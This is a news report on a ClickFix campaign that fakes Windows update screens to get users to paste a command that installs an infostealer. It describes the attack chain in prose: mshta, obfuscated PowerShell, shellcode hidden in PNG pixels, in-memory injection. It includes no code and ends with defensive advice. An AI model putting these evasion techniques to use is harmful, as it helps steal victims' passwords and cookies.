New ClickFix Malware Campaign Masquerades as Windows Update to Evade Detection
WASHINGTON, D.C. — Cybersecurity experts have uncovered a sophisticated new iteration of the ClickFix malware campaign that tricks users into installing malicious software by masquerading as legitimate Windows updates. This latest tactic exploits the trust users place in system prompts, using highly convincing fake update screens to coax victims into executing commands that unleash stealthy malware.
Unlike earlier versions of ClickFix, which relied on fake human verification pages, the current campaign presents a full-screen Windows update interface complete with progress bars and familiar messaging. Users are prompted to open the Run dialog box and paste a seemingly innocuous command from their clipboard. This command silently downloads a malware dropper that ultimately installs an infostealer designed to harvest passwords, cookies, and other sensitive information.
Researchers at Joe Security detailed how the attack chain begins with the execution of mshta.exe, which contacts a remote server to retrieve a script. To evade detection, the URLs involved use hex encoding and frequently rotate, complicating efforts by defenders to track malicious infrastructure. The script then launches obfuscated PowerShell code filled with extraneous instructions to confuse analysts.
What makes this campaign particularly difficult to detect is its use of steganography — a technique that hides data within other seemingly benign content. In this case, the malware’s next stage is concealed inside the pixel data of ordinary PNG image files. By subtly altering color values, especially in the red channel, the attackers embed shellcode that remains invisible to the naked eye and undetectable by conventional file scanning tools.
Once the infected image is processed, the embedded shellcode is extracted, decrypted, and reconstructed entirely in memory without ever being written to disk. This in-memory execution allows the malware to bypass many endpoint detection systems that rely on scanning files stored on the hard drive. The shellcode then injects itself into legitimate processes, further complicating efforts to identify and remove the infection.
The Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) has issued warnings about the increasing sophistication of malware campaigns leveraging social engineering and advanced evasion techniques. This ClickFix campaign exemplifies the evolving threat landscape where attackers exploit user trust and technical loopholes to bypass security defenses.
Microsoft’s own security teams have emphasized the importance of verifying update prompts through official channels and cautioning users against executing commands from untrusted sources. The company’s security portal offers guidance on recognizing legitimate updates and avoiding common phishing tactics.
Cybersecurity firms recommend that organizations employ behavioral detection tools and network monitoring to identify unusual PowerShell activity or unexpected outbound connections that may indicate infection. The FBI’s Cyber Division (FBI Cyber) also advises vigilance against social engineering attacks that mimic trusted system interfaces.
As cybercriminals continue to refine their methods, users are urged to remain cautious when prompted to install updates or run commands, especially when these requests come from unsolicited websites or unexpected pop-ups. Regularly updating software through official channels and maintaining robust endpoint protection remain critical defenses against campaigns like ClickFix.
For more information on protecting against malware and social engineering attacks, visit the U.S. Cybersecurity and Infrastructure Security Agency’s tips page.
Leave a Reply